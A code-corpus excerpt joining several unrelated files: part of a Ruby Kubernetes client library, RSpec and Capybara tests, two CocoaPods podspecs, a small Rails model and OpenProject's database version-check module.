def respond_to_missing?(method_sym, include_private = false)
if discovery_needed?(method_sym)
discover
respond_to?(method_sym, include_private)
else
super
end
end
def discovery_needed?(method_sym)
!@discovered && ENTITY_METHODS.any? { |x| method_sym.to_s.start_with?(x) }
end
def handle_exception
yield
rescue RestClient::Exception => e
json_error_msg = begin
JSON.parse(e.response || '') || {}
rescue JSON::ParserError
{}
end
err_message = json_error_msg['message'] || e.message
error_klass = e.http_code == 404 ? ResourceNotFoundError : HttpError
raise error_klass.new(e.http_code, err_message, e.response)
end
def discover
load_entities
define_entity_methods
@discovered = true
end
def self.parse_definition(kind, name)
# "name": "componentstatuses", networkpolicies, endpoints
# "kind": "ComponentStatus" NetworkPolicy, Endpoints
# maintain pre group api compatibility for endpoints and securitycontextconstraints.
# See: https://github.com/kubernetes/kubernetes/issues/8115
kind = kind[0..-2] if %w[Endpoints SecurityContextConstraints].include?(kind)
prefix = kind =~ /[A-Z]/ ? kind[0..kind.rindex(/[A-Z]/)] : kind # NetworkP
m = name.match(/^#{prefix.downcase}(.*)$/)
m && OpenStruct.new(
entity_type: kind, # ComponentStatus
resource_name: name, # componentstatuses
method_names: [
ClientMixin.underscore_entity(kind), # component_status
ClientMixin.underscore_entity(prefix) + m[1] # component_statuses
]
)
end
def handle_uri(uri, path)
raise ArgumentError, 'Missing uri' unless uri
@api_endpoint = (uri.is_a?(URI) ? uri : URI.parse(uri))
@api_endpoint.path = path if @api_endpoint.path.empty?
@api_endpoint.path = @api_endpoint.path.chop if @api_endpoint.path.end_with?('/')
components = @api_endpoint.path.to_s.split('/') # ["", "api"] or ["", "apis", batch]
@api_group = components.length > 2 ? components[2] + '/' : ''
end
def build_namespace_prefix(namespace)
namespace.to_s.empty? ? '' : "namespaces/#{namespace}/"
end
def define_entity_methods
@entities.values.each do |entity|
# get all entities of a type e.g. get_nodes, get_pods, etc.
define_singleton_method("get_#{entity.method_names[1]}") do |options = {}|
get_entities(entity.entity_type, entity.resource_name, options)
end
# watch all entities of a type e.g. watch_nodes, watch_pods, etc.
define_singleton_method("watch_#{entity.method_names[1]}") do |options = {}|
# This method used to take resource_version as a param, so
# this conversion is to keep backwards compatibility
options = { resource_version: options } unless options.is_a?(Hash)
watch_entities(entity.resource_name, options)
end
# get a single entity of a specific type by name
define_singleton_method("get_#{entity.method_names[0]}") \
do |name, namespace = nil, opts = {}|
get_entity(entity.resource_name, name, namespace, opts)
end
define_singleton_method("delete_#{entity.method_names[0]}") \
do |name, namespace = nil, opts = {}|
delete_entity(entity.resource_name, name, namespace, opts)
end
define_singleton_method("create_#{entity.method_names[0]}") do |entity_config|
create_entity(entity.entity_type, entity.resource_name, entity_config)
end
define_singleton_method("update_#{entity.method_names[0]}") do |entity_config|
update_entity(entity.resource_name, entity_config)
end
define_singleton_method("patch_#{entity.method_names[0]}") do |name, patch, namespace = nil|
patch_entity(entity.resource_name, name, patch, namespace)
end
end
end
def self.underscore_entity(entity_name)
entity_name.gsub(/([a-z])([A-Z])/, '\1_\2').downcase
end
def create_rest_client(path = nil)
path ||= @api_endpoint.path
options = {
ssl_ca_file: @ssl_options[:ca_file],
ssl_cert_store: @ssl_options[:cert_store],
verify_ssl: @ssl_options[:verify_ssl],
ssl_client_cert: @ssl_options[:client_cert],
ssl_client_key: @ssl_options[:client_key],
proxy: @http_proxy_uri,
user: @auth_options[:username],
password: @auth_options[:password],
open_timeout: @timeouts[:open],
read_timeout: @timeouts[:read]
}
RestClient::Resource.new(@api_endpoint.merge(path).to_s, options)
end
def rest_client
@rest_client ||= begin
create_rest_client("#{@api_endpoint.path}/#{@api_version}")
end
end
# Accepts the following options:
# :namespace (string) - the namespace of the entity.
# :name (string) - the name of the entity to watch.
# :label_selector (string) - a selector to restrict the list of returned objects by labels.
# :field_selector (string) - a selector to restrict the list of returned objects by fields.
# :resource_version (string) - shows changes that occur after passed version of a resource.
# :as (:raw|:ros) - defaults to :ros
# :raw - return the raw response body as a string
# :ros - return a collection of RecursiveOpenStruct objects
def watch_entities(resource_name, options = {})
ns = build_namespace_prefix(options[:namespace])
path = "watch/#{ns}#{resource_name}"
path += "/#{options[:name]}" if options[:name]
uri = @api_endpoint.merge("#{@api_endpoint.path}/#{@api_version}/#{path}")
params = {}
WATCH_ARGUMENTS.each { |k, v| params[k] = options[v] if options[v] }
uri.query = URI.encode_www_form(params) if params.any?
Kubeclient::Common::WatchStream.new(
uri,
http_options(uri),
formatter: ->(value) { format_response(options[:as] || @as, value) }
)
end
# Accepts the following options:
# :namespace (string) - the namespace of the entity.
# :label_selector (string) - a selector to restrict the list of returned objects by labels.
# :field_selector (string) - a selector to restrict the list of returned objects by fields.
# :limit (integer) - a maximum number of items to return in each response
# :continue (string) - a token used to retrieve the next chunk of entities
# :as (:raw|:ros) - defaults to :ros
# :raw - return the raw response body as a string
# :ros - return a collection of RecursiveOpenStruct objects
def get_entities(entity_type, resource_name, options = {})
params = {}
SEARCH_ARGUMENTS.each { |k, v| params[k] = options[v] if options[v] }
ns_prefix = build_namespace_prefix(options[:namespace])
response = handle_exception do
rest_client[ns_prefix + resource_name]
.get({ 'params' => params }.merge(@headers))
end
format_response(options[:as] || @as, response.body, entity_type)
end
# Accepts the following options:
# :as (:raw|:ros) - defaults to :ros
# :raw - return the raw response body as a string
# :ros - return a collection of RecursiveOpenStruct objects
def get_entity(resource_name, name, namespace = nil, options = {})
ns_prefix = build_namespace_prefix(namespace)
response = handle_exception do
rest_client[ns_prefix + resource_name + "/#{name}"]
.get(@headers)
end
format_response(options[:as] || @as, response.body)
end
# delete_options are passed as a JSON payload in the delete request
def delete_entity(resource_name, name, namespace = nil, delete_options: {})
delete_options_hash = delete_options.to_hash
ns_prefix = build_namespace_prefix(namespace)
payload = delete_options_hash.to_json unless delete_options_hash.empty?
response = handle_exception do
rs = rest_client[ns_prefix + resource_name + "/#{name}"]
RestClient::Request.execute(
rs.options.merge(
method: :delete,
url: rs.url,
headers: { 'Content-Type' => 'application/json' }.merge(@headers),
payload: payload
)
)
end
format_response(@as, response.body)
end
def create_entity(entity_type, resource_name, entity_config)
# Duplicate the entity_config to a hash so that when we assign
# kind and apiVersion, this does not mutate original entity_config obj.
hash = entity_config.to_hash
ns_prefix = build_namespace_prefix(hash[:metadata][:namespace])
# TODO: temporary solution to add "kind" and apiVersion to request
# until this issue is solved
# https://github.com/GoogleCloudPlatform/kubernetes/issues/6439
# TODO: #2 solution for
# https://github.com/kubernetes/kubernetes/issues/8115
hash[:kind] = (entity_type.eql?('Endpoint') ? 'Endpoints' : entity_type)
hash[:apiVersion] = @api_group + @api_version
response = handle_exception do
rest_client[ns_prefix + resource_name]
.post(hash.to_json, { 'Content-Type' => 'application/json' }.merge(@headers))
end
format_response(@as, response.body)
end
def update_entity(resource_name, entity_config)
name = entity_config[:metadata][:name]
ns_prefix = build_namespace_prefix(entity_config[:metadata][:namespace])
response = handle_exception do
rest_client[ns_prefix + resource_name + "/#{name}"]
.put(entity_config.to_h.to_json, { 'Content-Type' => 'application/json' }.merge(@headers))
end
format_response(@as, response.body)
end
def patch_entity(resource_name, name, patch, namespace = nil)
ns_prefix = build_namespace_prefix(namespace)
response = handle_exception do
rest_client[ns_prefix + resource_name + "/#{name}"]
.patch(
patch.to_json,
{ 'Content-Type' => 'application/strategic-merge-patch+json' }.merge(@headers)
)
end
format_response(@as, response.body)
end
def all_entities(options = {})
discover unless @discovered
@entities.values.each_with_object({}) do |entity, result_hash|
# method call for get each entities
# build hash of entity name to array of the entities
method_name = "get_#{entity.method_names[1]}"
begin
result_hash[entity.method_names[0]] = send(method_name, options)
rescue Kubeclient::HttpError
next # do not fail due to resources not supporting get
end
end
end
def get_pod_log(pod_name, namespace,
container: nil, previous: false,
timestamps: false, since_time: nil, tail_lines: nil)
params = {}
params[:previous] = true if previous
params[:container] = container if container
params[:timestamps] = timestamps if timestamps
params[:sinceTime] = format_datetime(since_time) if since_time
params[:tailLines] = tail_lines if tail_lines
ns = build_namespace_prefix(namespace)
handle_exception do
rest_client[ns + "pods/#{pod_name}/log"]
.get({ 'params' => params }.merge(@headers))
end
end
def watch_pod_log(pod_name, namespace, container: nil)
# Adding the "follow=true" query param tells the Kubernetes API to keep
# the connection open and stream updates to the log.
params = { follow: true }
params[:container] = container if container
ns = build_namespace_prefix(namespace)
uri = @api_endpoint.dup
uri.path += "/#{@api_version}/#{ns}pods/#{pod_name}/log"
uri.query = URI.encode_www_form(params)
Kubeclient::Common::WatchStream.new(uri, http_options(uri), formatter: ->(value) { value })
end
def proxy_url(kind, name, port, namespace = '')
discover unless @discovered
entity_name_plural =
if %w[services pods nodes].include?(kind.to_s)
kind.to_s
else
@entities[kind.to_s].resource_name
end
ns_prefix = build_namespace_prefix(namespace)
rest_client["#{ns_prefix}#{entity_name_plural}/#{name}:#{port}/proxy"].url
end
def process_template(template)
ns_prefix = build_namespace_prefix(template[:metadata][:namespace])
response = handle_exception do
rest_client[ns_prefix + 'processedtemplates']
.post(template.to_h.to_json, { 'Content-Type' => 'application/json' }.merge(@headers))
end
JSON.parse(response)
end
def api_valid?
result = api
result.is_a?(Hash) && (result['versions'] || []).any? do |group|
@api_group.empty? ? group.include?(@api_version) : group['version'] == @api_version
end
end
def api
response = handle_exception { create_rest_client.get(@headers) }
JSON.parse(response)
end
private
# Format ditetime according to RFC3339
def format_datetime(value)
case value
when DateTime, Time
value.strftime('%FT%T.%9N%:z')
when String
value
else
raise ArgumentError, "unsupported type '#{value.class}' of time value '#{value}'"
end
end
def format_response(as, body, list_type = nil)
case as
when :raw
body
when :parsed
JSON.parse(body)
when :parsed_symbolized
JSON.parse(body, symbolize_names: true)
when :ros
result = JSON.parse(body)
if list_type
resource_version =
result.fetch('resourceVersion') do
result.fetch('metadata', {}).fetch('resourceVersion', nil)
end
# If 'limit' was passed save the continue token
# see https://kubernetes.io/docs/reference/using-api/api-concepts/#retrieving-large-results-sets-in-chunks
continue = result.fetch('metadata', {}).fetch('continue', nil)
# result['items'] might be nil due to https://github.com/kubernetes/kubernetes/issues/13096
collection = result['items'].to_a.map { |item| Kubeclient::Resource.new(item) }
Kubeclient::Common::EntityList.new(list_type, resource_version, collection, continue)
else
Kubeclient::Resource.new(result)
end
else
raise ArgumentError, "Unsupported format #{as.inspect}"
end
end
def load_entities
@entities = {}
fetch_entities['resources'].each do |resource|
next if resource['name'].include?('/')
resource['kind'] ||=
Kubeclient::Common::MissingKindCompatibility.resource_kind(resource['name'])
entity = ClientMixin.parse_definition(resource['kind'], resource['name'])
@entities[entity.method_names[0]] = entity if entity
end
end
def fetch_entities
JSON.parse(handle_exception { rest_client.get(@headers) })
end
def bearer_token(bearer_token)
@headers ||= {}
@headers[:Authorization] = "Bearer #{bearer_token}"
end
def validate_auth_options(opts)
# maintain backward compatibility:
opts[:username] = opts[:user] if opts[:user]
if %i[bearer_token bearer_token_file username].count { |key| opts[key] } > 1
raise(
ArgumentError,
'Invalid auth options: specify only one of username/password,' \
' bearer_token or bearer_token_file'
)
elsif %i[username password].count { |key| opts[key] } == 1
raise ArgumentError, 'Basic auth requires both username & password'
end
end
def validate_bearer_token_file
msg = "Token file #{@auth_options[:bearer_token_file]} does not exist"
raise ArgumentError, msg unless File.file?(@auth_options[:bearer_token_file])
msg = "Cannot read token file #{@auth_options[:bearer_token_file]}"
raise ArgumentError, msg unless File.readable?(@auth_options[:bearer_token_file])
end
def http_options(uri)
options = {
basic_auth_user: @auth_options[:username],
basic_auth_password: @auth_options[:password],
headers: @headers,
http_proxy_uri: @http_proxy_uri
}
if uri.scheme == 'https'
options[:ssl] = {
ca_file: @ssl_options[:ca_file],
cert: @ssl_options[:client_cert],
cert_store: @ssl_options[:cert_store],
key: @ssl_options[:client_key],
# ruby HTTP uses verify_mode instead of verify_ssl
# http://ruby-doc.org/stdlib-1.9.3/libdoc/openssl/rdoc/OpenSSL/SSL/SSLContext.html
verify_mode: @ssl_options[:verify_ssl]
}
end
options.merge(@socket_options)
end
end
end
| 35.632727 | 116 | 0.642055 |
21b69f41b38f77be0a658212dcd7a2514850266f | 1,446 | require "spec_helper"
describe Viewpoint::EWSClient do
describe "#set_auto_deepen" do
let(:client) { described_class.new "http://www.example.com", "test", "test" }
it "sets autodeepen to true on the web service" do
ews = double "ews"
expect(ews).to receive(:auto_deepen=).with(true) {true}
expect(client).to receive(:ews) {ews}
client.set_auto_deepen true
end
it "sets autodeepen to false on the web service with a behavior of 'raise'" do
ews = double "ews"
expect(ews).to receive(:no_auto_deepen_behavior=).with(:raise) {:raise}
expect(ews).to receive(:auto_deepen=).with(false) {false}
expect(client).to receive(:ews).twice {ews}
client.set_auto_deepen false
end
end
describe '#new' do
let(:connection) { instance_double(Viewpoint::EWS::Connection, set_auth: nil, set_bearer: nil) }
let(:http_class) { class_double(Viewpoint::EWS::Connection, new: connection) }
context 'new with basic auth' do
it do
described_class.new "http://www.example.com", "username", "password", http_class: http_class
expect(connection).to have_received(:set_auth).with("username", "password")
end
end
context 'new with token auth' do
it do
described_class.new "http://www.example.com", :bearer, "token", http_class: http_class
expect(connection).not_to have_received(:set_auth)
end
end
end
end
| 32.133333 | 101 | 0.66805 |
ac414a981e00000af5db04ebe9e4a9c8531b215f | 702 | Pod::Spec.new do |s|
s.platform = :ios
s.ios.deployment_target = '10.0'
s.name = "SwipeDownViewController"
s.summary = "SwipeDownViewController lets a user dismiss a ViewController using a swipe down gesture."
s.requires_arc = true
s.version = "0.1.0"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Allan Scofield" => "[email protected]" }
s.homepage = "https://github.com/allanscofield/SwapDownViewController"
s.source = { :git => "https://github.com/allanscofield/SwapDownViewController.git", :tag => "#{s.version}" }
s.framework = "UIKit"
s.source_files = "SwipeDownViewController/Sources/*.{swift}"
s.swift_version = "4.2"
end
| 39 | 112 | 0.65812 |
1af9c78a8d38ebfb58b43c66b0eb45246143eea4 | 3,919 | require 'json'
require 'date'
root = ENV['EMISSION_ROOT'] || __dir__
pkg_version = lambda do |dir_from_root = '', version = 'version'|
path = File.join(root, dir_from_root, 'package.json')
JSON.load(File.read(path))[version]
end
emission_version = pkg_version.call
emission_native_version = pkg_version.call('', 'native-code-version')
react_native_version = pkg_version.call('node_modules/react-native')
podspec = Pod::Spec.new do |s|
s.name = 'Emission'
s.version = emission_version
s.summary = 'React Native Components used by Eigen.'
s.homepage = 'https://github.com/artsy/emission'
s.license = 'MIT'
s.author = { 'Artsy Mobile' => '[email protected]' }
s.source = { git: 'https://github.com/artsy/emission.git', tag: "v#{s.version}" }
s.platform = :ios, '12.0'
s.source_files = 'Pod/Classes/**/*.{h,m}'
s.preserve_paths = 'Pod/Classes/**/*.generated.objc'
s.resources = 'Pod/Assets/{Emission.js,assets,PreHeatedGraphQLCache}'
# Required for email composer
s.framework = 'MessageUI'
# Artsy UI dependencies
s.dependency 'Artsy+UIColors'
s.dependency 'Artsy+UIFonts', '>= 3.0.0'
s.dependency 'Extraction', '>= 1.2.1'
# Used in City Guides
s.dependency 'Pulley'
# Used in ARGraphQLQueryCache
s.dependency 'ISO8601DateFormatter'
# To ensure a consistent image cache between app/lib
s.dependency 'SDWebImage', '>= 3.7.2', '< 4'
# For custom animations in DeepZoomOverlay
s.dependency 'INTUAnimationEngine'
# React, and the subspecs we have to use
s.dependency 'React-Core', react_native_version
s.dependency 'React-cxxreact', react_native_version
s.dependency 'React-RCTAnimation', react_native_version
s.dependency 'React-RCTImage', react_native_version
s.dependency 'React-RCTLinking', react_native_version
s.dependency 'React-RCTNetwork', react_native_version
s.dependency 'React-RCTText', react_native_version
# s.dependency 'React-RCTGeolocation', react_native_version
s.dependency 'React-RCTActionSheet', react_native_version
# React's Dependencies
# s.dependency 'Yoga', "#{react_native_version}.React"
react_podspecs = [
'node_modules/react-native/third-party-podspecs/DoubleConversion.podspec',
'node_modules/react-native/third-party-podspecs/Folly.podspec',
'node_modules/react-native/third-party-podspecs/glog.podspec'
]
# Native dependencies of Emission, which come from node_modules
dep_podspecs = [
'node_modules/tipsi-stripe/tipsi-stripe.podspec',
'node_modules/@mapbox/react-native-mapbox-gl/react-native-mapbox-gl.podspec',
'node_modules/react-native-sentry/SentryReactNative.podspec',
'node_modules/react-native-svg/RNSVG.podspec',
'node_modules/react-native-navigator-ios/react-native-navigator-ios.podspec',
'node_modules/@react-native-community/cameraroll/react-native-cameraroll.podspec',
'node_modules/@react-native-community/netinfo/react-native-netinfo.podspec',
'node_modules/@react-native-community/geolocation/react-native-geolocation.podspec'
]
# Ties the exact versions so host apps don't need to guess the version
# or have a potential mismatch
podspecs = react_podspecs + dep_podspecs
podspecs.each do |podspec_path|
spec = Pod::Specification.from_file podspec_path
s.dependency spec.name, spec.version.to_s
end
end
if ENV['INCLUDE_METADATA']
# Attach the useful metadata to the podspec, which can be used in admin tools
podspec.attributes_hash['native_version'] = emission_native_version
podspec.attributes_hash['release_date'] = DateTime.now.strftime('%h %d, %Y')
podspec.attributes_hash['sha'] = `git rev-parse HEAD`.strip
podspec.attributes_hash['react_native_version'] = react_native_version
podspec.attributes_hash['app_registry'] = File.read('./src/lib/AppRegistry.tsx').scan(/AppRegistry.registerComponent\(\"(.*)\"/).flatten
end
podspec
| 40.402062 | 138 | 0.734116 |
01d93ea8483c2e1d2a1f2eaf464464d9d86f545f | 638 | class Country
include ActiveModel::Model
attr_reader :simple_id, :entity_id, :enabled
validates_presence_of :simple_id, :entity_id, :enabled
def initialize(hash)
@simple_id = hash['simple_id']
@entity_id = hash['entity_id']
@enabled = hash['enabled']
end
def self.from_api(hash)
new(
'simple_id' => hash['simpleId'],
'entity_id' => hash['entityId'],
'enabled' => hash['enabled']
)
end
def self.from_session(object)
return object if object.is_a? Country
new(object) if object.is_a?(Hash) || (object.is_a?(SelectedProviderData) && object.is_selected_country?)
end
end
| 24.538462 | 108 | 0.667712 |
114a4acd354a6c80b37e1b6633245341134af994 | 12,124 | require 'rails_helper'
feature 'Curriculum Editor', js: true do
include UserSpecHelper
include MarkdownEditorHelper
include NotificationHelper
# Setup a course with a single founder target, ...
let!(:school) { create :school, :current }
let!(:course) { create :course, school: school }
let!(:course_2) { create :course, school: school }
let!(:course_3) { create :course, school: school }
let!(:evaluation_criterion) { create :evaluation_criterion, course: course }
let!(:school_admin) { create :school_admin, school: school }
let!(:faculty) { create :faculty, school: school }
let!(:course_author) { create :course_author, course: course, user: faculty.user }
let!(:course_author_2) { create :course_author, course: course_2, user: faculty.user }
let!(:level_1) { create :level, :one, course: course }
let!(:level_2) { create :level, :two, course: course }
let!(:target_group_1) { create :target_group, level: level_1, sort_index: 1 }
let!(:target_group_2) { create :target_group, level: level_2, sort_index: 1 }
let!(:target_1) { create :target, target_group: target_group_1 }
let!(:target_2) { create :target, target_group: target_group_1, prerequisite_targets: [target_5] }
let!(:target_3) { create :target, target_group: target_group_2 }
let!(:target_4) { create :target, target_group: target_group_2, prerequisite_targets: [target_3] }
# Target with contents
let!(:target_5) { create :target, :with_content, target_group: target_group_2 }
# Data for level
let(:new_level_name) { Faker::Lorem.sentence }
let(:date) { Time.zone.today }
# Data for target group 1
let(:new_target_group_name) { Faker::Lorem.sentence }
let(:new_target_group_description) { Faker::Lorem.sentence }
# Data for target group 2
let(:new_target_group_name_2) { Faker::Lorem.sentence }
# Data for a normal target
let(:new_target_1_title) { Faker::Lorem.sentence }
around do |example|
Time.use_zone(school_admin.user.time_zone) { example.run }
end
scenario 'admin creates a basic course framework by adding level, target group and targets' do
sign_in_user school_admin.user, referrer: curriculum_school_course_path(course, level: 1)
# When the level number is specified as a param, it should be selected.
expect(page).to have_text(target_group_1.name)
visit(curriculum_school_course_path(course))
# Visiting the page without the level param should default selection to the max level, with all is targets and groups visible.
expect(page).to have_text(target_group_2.name)
expect(page).to have_text(target_3.title)
expect(page).to have_text(target_4.title)
# targets and target groups from other levels should not be visible
expect(page).not_to have_text(target_group_1.name)
expect(page).not_to have_text(target_1.title)
expect(page).not_to have_text(target_2.title)
# he should be able to create a new level
click_button 'Create Chapter'
expect(page).to have_text('Chapter Name')
fill_in 'Chapter Name', with: new_level_name
fill_in 'Unlock chapter on', with: date.iso8601
click_button 'Create New Chapter'
expect(page).to have_text('Chapter created successfully')
dismiss_notification
level = course.reload.levels.last
expect(level.name).to eq(new_level_name)
expect(level.unlock_at).to eq(Time.zone.now.beginning_of_day)
# he should be able to edit the level
find('button[title="Edit selected chapter"').click
expect(page).to have_text(new_level_name)
fill_in 'Unlock chapter on', with: '', fill_options: { clear: :backspace }
click_button 'Update Chapter'
expect(page).to have_text('Chapter updated successfully')
dismiss_notification
expect(level.reload.unlock_at).to eq(nil)
# he should be able to create a new target group
find('.target-group__create').click
expect(page).to have_text('SECTION DETAILS')
fill_in 'Title', with: new_target_group_name
replace_markdown(new_target_group_description, id: 'description')
click_button 'Yes'
click_button 'Create Section'
expect(page).to have_text('Section created successfully')
dismiss_notification
level.reload
target_group = level.target_groups.last
expect(target_group.name).to eq(new_target_group_name)
expect(target_group.description).to eq(new_target_group_description)
expect(target_group.milestone).to eq(true)
# he should be able to update a target group
current_sort_index = target_group.sort_index
find('.target-group__header', text: target_group.name).click
expect(page).to have_text(target_group.name)
expect(page).to have_text(target_group.description)
fill_in 'Description', with: '', fill_options: { clear: :backspace }
within('.milestone') do
click_button 'No'
end
click_button 'Update Section'
expect(page).to have_text('Section updated successfully')
dismiss_notification
target_group.reload
expect(target_group.description).not_to eq(new_target_group_description)
expect(target_group.milestone).to eq(false)
expect(target_group.sort_index).to eq(current_sort_index)
# he should be able to create another target group
find('.target-group__create').click
expect(page).to have_text('SECTION DETAILS')
fill_in 'Title', with: new_target_group_name_2
click_button 'Yes'
click_button 'Create Section'
expect(page).to have_text('Section created successfully')
dismiss_notification
# Update sort index
find("#target-group-move-down-#{target_group.id}").click
expect { target_group.reload.sort_index }.to eventually(eq 1)
sleep 0.2
find("#target-group-move-up-#{target_group.id}").click
expect { target_group.reload.sort_index }.to eventually(eq 0)
sleep 0.2
# user should be able to create a draft target from the curriculum index
find("#create-target-input#{target_group.id}").click
fill_in "create-target-input#{target_group.id}", with: new_target_1_title
click_button 'Create'
expect(page).to have_text('Lesson created successfully')
dismiss_notification
target = target_group.reload.targets.last
expect(target.title).to eq(new_target_1_title)
expect(page).to have_text(new_target_1_title)
within("a#target-show-#{target.id}") do
expect(page).to have_text('Draft')
end
end
scenario 'course author can navigate only to assigned courses and modify content of those courses' do
sign_in_user course_author.user, referrer: curriculum_school_course_path(course)
click_button course.name
expect(page).to have_link(course_2.name, href: "/school/courses/#{course_2.id}/curriculum")
expect(page).to_not have_link(course_3.name, href: "/school/courses/#{course_3.id}/curriculum")
click_link course_2.name
expect(page).to have_button(course_2.name)
expect(page).to_not have_link(href: '/school/coaches')
expect(page).to_not have_link(href: '/school/customize')
expect(page).to_not have_link(href: '/school/courses')
expect(page).to_not have_link(href: '/school/communities')
expect(page).to have_link(href: '/dashboard')
[school_path, curriculum_school_course_path(course_3), school_communities_path, school_courses_path, customize_school_path].each do |path|
visit path
expect(page).to have_text("The page you were looking for doesn't exist!")
end
visit curriculum_school_course_path(course)
find("#create-target-input#{target_group_2.id}").click
fill_in "create-target-input#{target_group_2.id}", with: new_target_1_title
click_button 'Create'
expect(page).to have_text('Lesson created successfully')
dismiss_notification
end
scenario "author sets unlock date for a level that previously didn't have one" do
sign_in_user course_author.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
fill_in 'Unlock chapter on', with: date.iso8601
click_button 'Update Chapter'
expect(page).to have_text('Chapter updated successfully')
expect(level_2.reload.unlock_at).to eq(Time.zone.now.beginning_of_day)
end
context 'when there is a level zero and three other levels' do
let(:level_0) { create :level, :zero, course: course }
let(:level_3) { create :level, :three, course: course }
let!(:target_group_l0) { create :target_group, level: level_0 }
let!(:target_group_l3) { create :target_group, level: level_3 }
let!(:team_l3) { create :startup, level: level_3 }
scenario 'author merges third level into the first' do
sign_in_user course_author.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
click_button 'Actions'
select "C1: #{level_1.name}", from: 'Delete & Merge Into'
accept_confirm do
click_button 'Merge and Delete'
end
expect(page).to have_text(target_group_2.name)
expect { level_3.reload }.to raise_error(ActiveRecord::RecordNotFound)
expect(target_group_l3.reload.level).to eq(level_1)
expect(team_l3.reload.level).to eq(level_1)
end
scenario 'author is not allowed to merge third level into level zero' do
sign_in_user course_author.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
click_button 'Actions'
expect(page).not_to have_text("C0: #{level_0.name}")
end
end
scenario 'admin moves a target group from one level to another' do
sign_in_user school_admin.user, referrer: curriculum_school_course_path(course)
find('.target-group__header', text: target_group_2.name).click
expect(page).to have_text("Chapter #{target_group_2.level.number}: #{target_group_2.level.name}")
fill_in 'level_id', with: level_1.name
click_button "Pick Chapter 1: #{level_1.name}"
click_button 'Update Section'
expect(page).to have_text('Section updated successfully')
dismiss_notification
expect(target_group_2.reload.level).to eq(level_1)
expect(target_group_2.sort_index).to eq(2)
expect(target_2.reload.prerequisite_targets).to eq([])
expect(target_4.reload.prerequisite_targets).to eq([])
end
scenario 'user who is not logged in gets redirected to sign in page' do
visit curriculum_school_course_path(course)
expect(page).to have_text('Please sign in to continue.')
end
context 'copy level into course' do
let!(:target_1) { create :target, :with_content, target_group: target_group_1 }
let!(:target_2) { create :target, :with_content, target_group: target_group_1, prerequisite_targets: [target_5] }
let!(:target_3) { create :target, :with_content, target_group: target_group_2 }
let!(:target_4) { create :target, :with_content, target_group: target_group_2, prerequisite_targets: [target_3] }
scenario 'admin copies level into the same course' do
sign_in_user school_admin.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
click_button 'Actions'
find("div[data-submission-id=\"#{course.name}\"]").click
accept_confirm do
click_button 'Copy Chapter'
end
expect(page).to have_content('Chapter copy requested. It will apppear in target course soon!')
visit curriculum_school_course_path(course)
expect(all('option').last.text).to eq("Chapter 3: #{level_2.name}")
end
scenario 'admin copies level into another course' do
sign_in_user school_admin.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
click_button 'Actions'
find("div[data-submission-id=\"#{course_2.name}\"]").click
accept_confirm do
click_button 'Copy Chapter'
end
expect(page).to have_content('Chapter copy requested. It will apppear in target course soon!')
visit curriculum_school_course_path(course_2)
expect(all('option').last.text).to eq("Chapter 1: #{level_2.name}")
end
end
end
| 38.858974 | 142 | 0.728225 |
3327d014f0cc474467b4607bc61edca257049dcc | 6,051 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'semantic'
module OpenProject
# This module provides some information about the currently used database
# adapter. It can be used to write code specific to certain database
# vendors which, while not not encouraged, is sometimes necessary due to
# syntax differences.
module Database
DB_VALUE_FALSE = 'f'.freeze
DB_VALUE_TRUE = 't'.freeze
class InsufficientVersionError < StandardError; end
class UnsupportedDatabaseError < StandardError; end
# This method returns a hash which maps the identifier of the supported
# adapter to a regex matching the adapter_name.
def self.supported_adapters
@adapters ||= begin
{
postgresql: /postgres/i
}
end
end
##
# Get the database system requirements
def self.required_version
{
numeric: 90500, # PG_VERSION_NUM
string: '9.5.0'
}
end
##
# Check pending database migrations
# and cache the result for up to one hour
def self.migrations_pending?(ensure_fresh: false)
cache_key = OpenProject::Cache::CacheKey.key('database_migrations')
cached_result = Rails.cache.read(cache_key)
# Ensure cache is busted if result is positive or unset
# and the value was cached
if ensure_fresh || cached_result != false
fresh_result = connection.migration_context.needs_migration?
Rails.cache.write(cache_key, expires_in: 1.hour)
return fresh_result
end
false
end
##
# Check the database for
# * being postgresql
# * version compatibility
#
# Raises an +UnsupportedDatabaseError+ when the version is incompatible
# Raises an +InsufficientVersionError+ when the version is incompatible
def self.check!
if !postgresql?
message = "Database server is not PostgreSql. " \
"As OpenProject uses non standard ANSI-SQL for performance optimizations, using a different DBMS will " \
"break and is thus prevented."
if adapter_name.match?(/mysql/i)
message << " As MySql used to be supported, there is a migration script to ease the transition " \
"(https://www.openproject.org/deprecating-mysql-support/)."
end
raise UnsupportedDatabaseError.new message
elsif !version_matches?
current = version
message = "Database server version mismatch: Required version is #{required_version[:string]}, " \
"but current version is #{current}"
raise InsufficientVersionError.new message
end
end
##
# Return +true+ if the required version is matched by the current connection.
def self.version_matches?
numeric_version >= required_version[:numeric]
end
# Get the raw name of the currently used database adapter.
# This string is set by the used adapter gem.
def self.adapter_name(connection = self.connection)
connection.adapter_name
end
# Get the AR base connection object handle
# will open a db connection implicitly
def self.connection
ActiveRecord::Base.connection
end
# returns the identifier of the specified connection
# (defaults to ActiveRecord::Base.connection)
def self.name(connection = self.connection)
supported_adapters.find(proc { [:unknown, //] }) do |_adapter, regex|
adapter_name(connection) =~ regex
end[0]
end
# Provide helper methods to quickly check the database type
# OpenProject::Database.postgresql? returns true, if we have a postgresql DB
